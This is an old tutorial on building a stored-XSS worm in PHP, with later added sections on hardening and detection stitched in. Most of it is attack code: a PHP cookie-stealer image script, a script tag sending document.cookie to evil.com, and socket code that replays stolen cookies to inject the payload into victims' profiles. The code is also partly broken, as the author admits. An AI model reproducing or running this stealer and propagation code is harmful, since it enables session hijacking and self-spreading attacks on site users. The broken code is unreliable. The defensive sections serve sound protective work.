PHP XSS Worm

If you find the formatting of this article to be off, please wget
picobsd.amdwebhost.com/~cfc/xss.txt

Before anyone flames me, the code in this article is purposefully
flawed. It will not work. A programmer should be able to get it to
work in a matter of minutes. I removed some code and modified other
stuff so that skiddies don't pick it up. This article is meant for
understanding, not as a contribution of code.

A while back, I was poking around a web 2.0 site. I noticed something
rather interesting: every single preference for users had its own file.
This was probably done because the site, which was AJAX based, modified
user information via AJAX, and therefore there was often only one
value being edited at a time. I started poking around these, and I
found out early on that all data sanitization was done with JavaScript.
I'm assuming this is because the developer was more comfortable with
JavaScript, and didn't use PHP for anything except what he had to
(editing database fields, etc.). Because filtering was done via
JavaScript, I figured it wasn't done on the PHP side (I was correct), so
if I could access the file directly, I was in business.

It worked. site.com/users_neighborhood.php was accessible, and when I
edited my neighborhood, I was able to insert a cookie stealer. The
cookie stealer employed my favorite concept, albeit not always possible:
the image. Which brings me to my first segment of code, the cookie
stealer itself:
<?php
$data = $_GET['data']; #get the cookie

#create image
header("Content-type: image/png"); #this is a PNG file
$image = imagecreate(1,1); #create a 1x1 image
imagecolorallocate(1,1,1); #set BG to white
imagepng($image); #display the image
imagedestroy($image); #delete image from temp memory

#store cookie
$fp = fopen("misc.html","r"); #open log file and append it
fputs($fp, $data."<br>"); #add the data
fclose($fp); #close file
?>

This code simply creates a 1x1 PNG image, sets the response's
Content-type to PNG, and appends the cookie passed in the query string to
a log file.
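The two defects described above (filtering only in JavaScript, and a session cookie readable by script) are both fixed on the server. The following is an added example, not the article's or the site's code: a hardened version of a `users_neighborhood.php`-style endpoint. It assumes an existing PDO connection in `$pdo`, a per-session CSRF token stored in `$_SESSION['csrf']`, and PHP 7.3+ for the array form of `session_set_cookie_params`.

```php
<?php
// Added example, not the article's or the site's code: a hardened
// users_neighborhood.php. The original site filtered only in JavaScript,
// so a direct POST skipped every check; everything below runs server-side.
// $pdo is assumed to be an existing PDO connection (PHP 7.3+ assumed).

// HttpOnly keeps the session id out of document.cookie, so the image-based
// stealer above gets nothing even if a script does run in the page.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    exit('not logged in');
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit('POST only');
}
// Per-session CSRF token issued with the edit form: a replayed cookie alone
// is not enough to make this endpoint accept a write.
if (!isset($_POST['csrf'], $_SESSION['csrf'])
    || !hash_equals($_SESSION['csrf'], $_POST['csrf'])) {
    http_response_code(403);
    exit('bad token');
}

// Allow-list validation on the server: letters, digits, space . ' - ; 1-60 chars.
function validateNeighborhood(string $raw): ?string
{
    $value = trim($raw);
    if ($value === '' || mb_strlen($value, 'UTF-8') > 60) {
        return null;
    }
    return preg_match('/^[\p{L}\p{N} .\'\-]+$/u', $value) === 1 ? $value : null;
}

$neighborhood = validateNeighborhood($_POST['neighborhood'] ?? '');
if ($neighborhood === null) {
    http_response_code(400);
    exit('invalid neighborhood');
}

$stmt = $pdo->prepare('UPDATE users SET neighborhood = ? WHERE id = ?');
$stmt->execute([$neighborhood, $_SESSION['user_id']]);

// Encode on output as well: whatever reaches the DB renders as text, not markup.
header('Content-Type: text/html; charset=utf-8');
echo '<span id="neighborhood">' . htmlspecialchars($neighborhood, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</span>';
```

With these checks in place the payload from the article is rejected at validation, and even a value that slipped through would be rendered as inert text.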

And the Javascript looked like this:
<script>document.write("<img src='http://evil.com/image.php?data="
document.cookie "'>");</script>

So, easy part down. Next is the propagation technique. I had a PHP
script that contained a variable with the entire cookie in it. So
the obvious thing to do at this point was to use sockets to connect to
our target site's users_neighborhood.php page with the hijacked cookie.
I did this by opening a socket and passing data to it. Here's the code:
<?PHP
#Connect Data
$host = "site.com"; #URL
$page = "/users_neighborhood.php"; #page
$agent = "BorgBrowser"; #user agent, used to specify the browser/program (googlebot, mozilla firefox, etc.)
$cookie = $data; #The cookie from above
$xss = "%3Cscript%3Edocument.write%28%22%3Cimg%20src%3D%27http%3A//evil.com/image.php%3Fdata%3D%22+document.cookie+%22%27%3E%22%29%3B%3C/script%3E"; #A URL encoded version of the XSS attack
$attack = "neighborhood=".$xss; #POST data with the XSS attack in it.
?>

This section of code just set up all the variables used later.

<?php
#Make Packet
function makePacket($host, $page, $agent, $rnum, $cookie, $data)
{
#Generate the packet
$packet = "POST ".$page." HTTP/1.1
"; #POST to the users_neighborhood page
$packet .= "Host: ".$host."
"; #specify the host
$packet .= "User-Agent: ".$agent."
"; #specify the user agent
$packet .= "Content-type: application/x-www-form-urlencoded
"; #the content type
$packet .= "Content-length: ".strlen($data)."
"; #the content length, found by strlen, which returns the length of a string
$packet .= "Set-Cookie: ".$cookie."
"; #And, set the cookie
$packet .= $attack; #and finally, our payload

#return packet
return $packet;
}
?>

This section is a function which allows us to create a valid HTTP/1.1
packet with POST data and cookie data in it.

<?php
#open network connection
$port = getservbyname('www', 'tcp'); #get the TCP port the WWW service uses
$addr = gethostbyname($host); #get the address of our host, as defined above
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); #create a socket
$result = socket_connect($socket, $addr, $port); #connect to the host on the WWW's port
?>

This section created our network connection to the site.

<?php
#Send Data
$in = makePacket($host, $page, $agent, $rnum, $cookie, $data); #Get the output of the makePacket function created above
socket_write($socket, $in, strlen($in)); #write the packet to the socket

#close network connection
socket_close($socket); #Close the socket connection
?>

This section of code wrote the HTTP packet to the site.



What we have done is use the XSS hole in the site to steal the cookie.
Our cookie stealer script not only logs cookies, but also uses them to
authenticate us as that user, which grants us the ability to edit THEIR
content and steal cookies using their page as well.
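From the defender's side, the propagation step leaves two traces: the stored value carries script markers, and a stolen session id starts writing from a host and user agent the real user never used. The following is an added example, not code from the article: two small checks against a constructed application log (format `ip|session_id|method|path|user_agent`, one request per line); the log format, function names and sample values are all assumptions for this example.

```php
<?php
// Added example, not from the article: two detections for the worm's traffic.
// The log format (one request per line: ip|session_id|method|path|user_agent)
// and the sample values are constructed for this example.

// looksLikeXssPayload: URL-decode a submitted field the way the server would
// and look for the markers the worm's payload carries.
function looksLikeXssPayload(string $value): bool
{
    $decoded = strtolower(html_entity_decode(urldecode($value), ENT_QUOTES | ENT_HTML5));
    foreach (['<script', 'document.cookie', 'onerror=', 'javascript:'] as $marker) {
        if (strpos($decoded, $marker) !== false) {
            return true;
        }
    }
    return false;
}

// findHijackedSessions: the worm replays a stolen cookie from its own host and
// user agent, so a session id that writes from a new ip|ua pair is suspicious.
function findHijackedSessions(array $lines): array
{
    $first = [];   // session_id => ip|ua pair the session started with
    $alerts = [];
    foreach ($lines as $line) {
        [$ip, $sid, $method, $path, $ua] = explode('|', trim($line), 5);
        $pair = "$ip|$ua";
        if (!isset($first[$sid])) {
            $first[$sid] = $pair;
        } elseif ($pair !== $first[$sid] && $method === 'POST') {
            $alerts[] = "$sid: POST $path from $pair, session began at {$first[$sid]}";
        }
    }
    return $alerts;
}

// constructed sample: one real user, then the worm posting with that user's cookie
$log = [
    '10.0.0.5|abc123|GET|/profile.php|Mozilla/5.0 Firefox/2.0',
    '10.0.0.5|abc123|POST|/users_neighborhood.php|Mozilla/5.0 Firefox/2.0',
    '203.0.113.9|abc123|POST|/users_neighborhood.php|BorgBrowser',
    '10.0.0.7|def456|GET|/profile.php|Mozilla/5.0 Safari/3.0',
];
print_r(findHijackedSessions($log));
var_dump(looksLikeXssPayload('%3Cscript%3Edocument.write%28%22%3Cimg%20src%3D%27http%3A//evil.com/image.php%3Fdata%3D%22+document.cookie+%22%27%3E%22%29%3B%3C/script%3E'));
var_dump(looksLikeXssPayload('Mission%20District'));
```

The session check only flags writes, since a user reading from two devices is normal; tightening it to any request, or adding a time window, is a policy choice for the site.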


LEGAL STUFF/DISCLAIMER: THE CODE IN THIS TUTORIAL WAS EDITED TO ENSURE
THAT IT DOES NOT WORK PROPERLY. THIS WAS DONE ON PURPOSE TO AVOID THE
USE OF THIS CODE FOR ILLEGITIMATE PURPOSES. THE CODE IS FOR POC
PURPOSES ONLY, MEANT TO DEMONSTRATE THE EXTENSION OF XSS HOLES. DON'T
DO BAD STUFF, CAUSE IT'S NOT ON ME IF YOU DO. THIS WORM WAS CREATED AND
TESTED IN A CONTROLLED ENVIRONMENT.
